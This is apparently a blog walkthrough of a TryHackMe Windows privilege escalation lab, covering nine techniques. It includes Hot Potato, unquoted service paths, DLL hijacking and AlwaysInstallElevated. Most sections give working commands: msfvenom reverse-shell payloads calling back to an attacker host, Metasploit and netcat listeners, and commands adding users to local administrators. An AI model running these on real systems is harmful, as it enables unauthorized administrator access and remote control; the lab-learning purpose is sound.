WinPrivEsc





This Walkthrough Corresponds to the Windows PrivEsc Arena in tryhackme Created by The Cyber Mentor.

 We have access to the RDP port of the machine with the user.

 The First task is to find who is a default user 
cmd.exe > net user

 

(PrivEsc 1)$> Password Mining Escalation[Configuration File]


This Path is a reading configuration file of The Installed software.
notepad C:\Windows\Panther\Unattend.xml
and find some values which can be password.

(PrivEsc 2)$> Potato Escalation[Hot Potato] using Tater

Hot Potato#> How it works=>

It takes advantage of NTLM relay specifically HTML: SMB relay
This technique is a combination of two known windows issues like NBNS spoofing and NTLM relay with the implementation of a fake WPAD proxy server which is running locally on the target host.

We will use Tater which is PowerShell implementation of the exploit:


1. In command prompt type: powershell.exe -nop -ep bypass
2. In Power Shell prompt type: Import-Module C:\Users\User\Desktop\Tools\Tater\Tater.ps1
3. In Power Shell prompt type: Invoke-Tater -Trigger 1 -Command "net localgroup administrators user /add"4. To confirm that the attack was successful, in Power Shell prompt type: net localgroup administrators

This Command Adds user to administrators Group

For more info about hot potato visit:- https://foxglovesecurity.com/2016/01/16/hot-potato/


(PrivEsc 3)$> Service Escalation [Unquoted Service Path]

The Unquoted Service Path is a severe vulnerability

[What is USP?]#> When a Program in windows have path without the quotes. The path is called unquoted service path. 
Like 

[Why is this vuln Dangerous?]#> This leads to gain access with SYSTEM privileges (if the service is running with system priv which is applicable in most of the case)

A malicious program can be run by using the spaces
like this 
c:\program files\sub dir\program.exe name


[How to check?]#> 

In cmd

wmic service get name,displayname,pathname,startmode |findstr /i “auto” |findstr /i /v “c:\windows\\” |findstr /i /v “””


 Windows VM

1. Open command prompt and type: sc qc unquotedsvc
2. Notice that the “BINARY_PATH_NAME” field displays a path that is not confined between quotes.

Exploitation

Kali VM

1. Open command prompt and type: msfvenom -p windows/exec CMD='net localgroup administrators user /add' -f exe-service -o common.exe2. Copy the generated file, common.exe, to the Windows VM.

Windows VM

1. Place common.exe in ‘C:\Program Files\Unquoted Path Service’.
2. Open command prompt and type: sc start unquotedsvc3. It is possible to confirm that the user was added to the local administrators group by typing the following in the command prompt: net localgroup administrators
This will add user to the group localgroup administrators 
The user should have permission to restart the service

 For further reference:- https://pentestlab.blog/2017/03/09/unquoted-service-path/

 (PrivEsc 4)$> Service Escalation [BinPath]

 [Binpath ?] 

The writable service which executes as admin results in BinPath

[Detection]

Windows VM

1. Accesschk64.exe servsvc

2. Notice that the output suggests that the user “User-PC\User” has the “SERVICE_CHANGE_CONFIG” permission.

[Exploitation]

Windows VM

1. In command prompt type: sc config servsvc binpath= "net localgroup administrators user /add"
2. Now restart the service.
3. Now check the localgroup administrators

 (PrivEsc 5)$> Service Escalation [DLL Highjacking]

[What is DLL?]#
DLL stands for Dynamic linked libraries. The DLL contains coded that can be used by more than one program.
For more info visit:- https://support.microsoft.com/en-us/help/815065/what-is-a-dll

[What is DLL HighJacking?]#

Suppose a program is run and a DLL is missing from the place where windows find it. Then the DLL can be replaced with malicious DLL and can be used to escalate privs. 

[Detection]#

1. Launch ProcMon in windows and check for processes with missing DLLs
2. Check for the permissions of the folder.

[Attack]#

Victim machine:- 
1. Creating a malicious DLL :- msfvenom -p windows/x64/meterpreter/reverse_tcp -LHOST= -LPORt= -f dll > hijack.dll
2. Copy dll to the path of the function
3. sc stop dllsvc & sc start dllsvc

 Attacker machine:-
1. nc -lvnp "PORT"

(PrivEsc 6)$> Priv Escalation [Startup via administrator]

[Detection] 

Windows VM
1. Open command prompt and type: icacls.exe "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup"
2. From the output notice that the “BUILTIN\Users” group has full access ‘(F)’ to the directory.

[Exploitation]

Kali VM

1. Open command prompt and type: msfconsole
2. In Metasploit (msf > prompt) type: use multi/handler
3. In Metasploit (msf > prompt) type: set payload windows/meterpreter/reverse_tcp
4. In Metasploit (msf > prompt) type: set lhost [Kali VM IP Address]
5. In Metasploit (msf > prompt) type: run
6. Open another command prompt and type: msfvenom -p windows/meterpreter/reverse_tcp LHOST=[Kali VM IP Address] -f exe -o x.exe
7. Copy the generated file, x.exe, to the Windows VM.

Windows VM

1. Place x.exe in “C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup”.
2. Logoff.
3. Log in with the administrator account credentials.

Kali VM

1. Wait for a session to be created, it may take a few seconds.
2. In Meterpreter(meterpreter > prompt) type: getuid
3. From the output, notice the user is “TCM”
  
(PrivEsc 7)$> Registry Escalation [AlwaysInstallElevated]

Installing a malicious with elevated privileges

[Detection]#

reg query HKLM\Software\Policies\Microsoft\Windows\Installer

So as we can see AlwaysInstallElevated is 1
We can take advantage

[Exploitation]#

Payload => msfvenom -p windows/meterpreter/reverse_tcp lhost=[Kali VM IP Address] -f msi -o setup.msi

2. Copy into a windows machine and start multi/handler in kali machine
3. msiexec /quiet /qn /i C:\Temp\setup.msi in windows machine 


(PrivEsc 8)$> Service Escalation [Registry]

[Detection]#

Run This command in powershell
“Get-Acl -Path hklm:\System\CurrentControlSet\services\regsvc | fl”
As we can see the “NT AUTHORITY\INTERACTIVE” has “FullContol” permission over the registry key

[Exploitation]#

Check for the program given in windows_service.c
Transfer to kali box and use  x86_64-w64-mingw32-gcc windows_service.c -o x.exe

Now tranfer x.exe to temp folder of windows machine and execute this command to add the program in registry

reg add HKLM\SYSTEM\CurrentControlSet\services\regsvc /v ImagePath /t REG_EXPAND_SZ /d c:\temp\x.exe /f

sc stop regsvc & sc start regsvc

(PrivEsc 9)$> Service Escalation [Executable file]

The Same malicious executable can be used in this also 

[Detection]#

accesschk64.exe -wvu C:\Program Files\File Permissions Service

If the group have FILE_ALL_ACCESS

Hurray!!! Privesc will work

[Exploitation]#

In windows machine

copy /y c:\Temp\x.exe "c:\Program Files\File Permissions Service\filepermservice.exe"

sc start filepermsvc

For setup and programs visit:-  https://github.com/sagishahar/lpeworkshop.git


Comments

Popular posts from this blog

Exploiting GhostCat(CVE-2020–1938)

TigerKing CTF Writeup